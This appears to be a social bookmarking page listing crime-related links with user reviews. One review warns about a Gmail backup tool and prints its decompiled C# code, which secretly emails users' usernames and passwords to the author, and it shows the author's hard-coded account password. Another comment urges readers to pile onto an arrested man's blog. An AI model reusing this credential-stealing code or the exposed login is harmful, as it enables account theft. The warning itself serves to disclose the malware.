Favorites » His crime pages

-
John W. Whitehead: Compliance Weapons: One Step Closer to a Police State? - Pol…
-
Jun 24, 5:08am
2 reviews
crime
http://www.huffingtonpost.com/john-w-whitehead/compliance-weapons-one-st_b_10...

-
Gmail inbox backup - Gmail emails backup software
-
Mar 8, 8:55pm
11 reviews
computers, crime
http://www.garchiver.com/
-
DO NOT USE THIS SOFTWARE. It sends an email to the author of the software with your gmail username and password. Read about it here:
http://www.codinghorror.com/blog/archives/001072.html
I confirmed this using the .NET Reflector. The author has hard-coded his username and password into the code. A code sleuth has since logged into the author's account and changed the author's login info, so the hard-coded info won't work anymore (i.e., it can't send your info using his login credentials). Here's actual C# code from disassembly:
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
This code block creates an email message containing your username and password and sends it to JTerry79@gmail.com (the author of the software) through his own gmail account. See his login info? See where he's creating a message with a Username and Password? That's *your* username and password.

-
FBI & D.B. Cooper - Press Room - Headline Archives 12-31-0…
-
Jan 5, 8:14am
5 reviews
crime
http://www.fbi.gov/page2/dec07/dbcooper123107.html

-
metro
-
Oct 7, 2007 8:23pm
5 reviews
crime
http://ny.metro.us/metro/blog/my_view/entry/The_police_state_of_our_schools/1...

-
CITIZEN-TIMES.com: Flag-defiling charge ends in fight, arrests (updated with mor…
-
Jul 28, 2007 8:23pm
4 reviews
crime
http://www.citizen-times.com/apps/pbcs.dll/article?AID=200770725118
-
Outrageous...fascist cop attacks hippy couple over "flag desecration"...check it out, they have a Ron Paul yard sign.

-
Fred On Everything
-
Jun 27, 2007 2:15pm
6 reviews
crime, race
http://www.fredoneverything.net/Diversity.shtml
-
Ignorant race-baiting at its not-so-subtle worst.

-
www.myspace.com/52589827
-
May 23, 2007 1:28pm
2 reviews
crime, liberal-politics, conservative-politics, politics, religion
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=525...
-
This is the myspace page for the guy who got arrested at Jerry Falwell's funeral with homemade bombs in his trunk, intending to keep protesters from disturbing the funeral. One of those Liberty University geniuses. While he's sitting in a cell somewhere waiting for what happens next, the comments on his blogs are open to the public. Have at it!

-
Police State Alert - The Police Attack FOX News crew
-
May 20, 2007 7:12pm
2 reviews
crime
http://www.abovetopsecret.com/forum/thread280828/pg1

-
USA PATRIOT Act - Wikipedia, the free encyclopedia
-
May 4, 2007 1:09pm
6 reviews
crime
http://en.wikipedia.org/wiki/USA_PATRIOT_Act

-
It Aint Just Paint - July 21, 2005
-
Apr 14, 2007 10:59pm
25 reviews
crime
http://www.thesmokinggun.com/archive/0721051gold1.html
 See more popular pages about crime liked by other StumbleUpon users.
|